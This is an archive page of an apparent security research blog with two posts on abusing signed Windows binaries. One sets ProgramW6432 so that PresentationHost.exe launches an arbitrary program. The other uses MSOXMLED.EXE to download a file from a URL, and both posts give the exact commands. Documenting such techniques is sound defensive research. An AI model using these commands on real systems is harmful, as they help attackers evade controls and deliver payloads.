You are browsing the archive for LOLBins.

Misre-presentation host

February 8, 2021 in Living off the land, LOLBins

PresentationHost.exe is a known LOLBIN so I approached it with a caution.

To my surprise, I discovered that it accepts a number of command line arguments:

  • Embedding – running as a server (?)
  • Debug – enables debugging (see next point)
  • DebugSecurityZoneURL – specifies XBAP URL used for debugging as per this old article
  • Event – ?
  • LaunchApplication — launch ClickOnce application
  • RegServer – registers server
  • UnregServer – unregisters server

Apart from DebugSecurityZoneURL that may be useful in some scenarios, my attention focused on the LaunchApplication. Not because it can launch ClickOnce application, but because it… launches iexplore.exe if it cannot find anything to launch.

And as it turns out it relies on a environment variable value while resolving the path to iexplore.exe. In certain configurations (32-bit presentationhost.exe executed in a 64-bit environment) it allow us to launch application of our choice. That is, new lolbin is born.

If we fake the value of ProgramW6432

set ProgramW6432=c:\test

and then launch

c:\windows\syswow64\PresentationHost.exe foo

It will attempt to launch Internet Explorer\IEXPLORE.EXE from a folder ProgramW6432 refers to e.g. c:\test\Internet Explorer\IEXPLORE.EXE:

As a side note, I am providing a copy of the article I referred to just in case it disappears from web. archive.org:

Desperate downloader lolbin

February 5, 2021 in LOLBins

I was toying around with the Office application MSOXMLED.EXE and noticed it handles URLs. Thanks to that it can be used to download file to internet cache folder as shown below:

There are at least two different ways to invoke it:

MSOXMLED.EXE /verb open [URL]
MSOXMLED.EXE /verb [anything] /genverb open [URL]

and the file is being downloaded to the InetCache folder:

c:\Users\[user]\AppData\Local\Microsoft\Windows\INetCache\Low\IE\[random]\[file]

The caveat is that it seems to be using Internet Explorer as a proxy, hence the iexplore.exe will be spawn. As such it doesn’t work on systems where IE is removed (thx to @NathanMcNulty for confirming this and reminding me about two different paths below).

The actual MSOXMLED.EXE binary is located in these two places (64- and 32-bit version):

  • c:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE
  • c:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLED.EXE

For anyone wondering,

MSOXMLED.EXE /verb open file://c:\windows\notepad.exe

does work, but we get a dialog box below (rendering this technique useless):

It could possibly work with some Registry tweaking, but have not invested time in checking it yet. Other option could be adding other extension handler.

Lame, not very ‘finesse’, but at least documented.